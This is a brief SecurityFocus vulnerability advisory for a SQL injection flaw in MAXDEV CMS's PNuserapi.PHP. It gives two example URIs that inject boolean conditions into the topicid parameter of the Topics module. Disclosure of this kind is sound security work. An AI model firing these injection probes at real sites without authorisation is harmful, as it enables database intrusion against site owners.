MAXDEV CMS PNuserapi.PHP SQL Injection Vulnerability

This issue can be exploited through a web client.


Example URIs have been provided:

http://www.example.com/maxdev/index.php?module=Topics&func=display&topicid=0 AND 1=0
http://www.example.com/maxdev/index.php?module=Topics&func=display&topicid=0 AND 1=1


 

Privacy Statement
Copyright 2010, SecurityFocus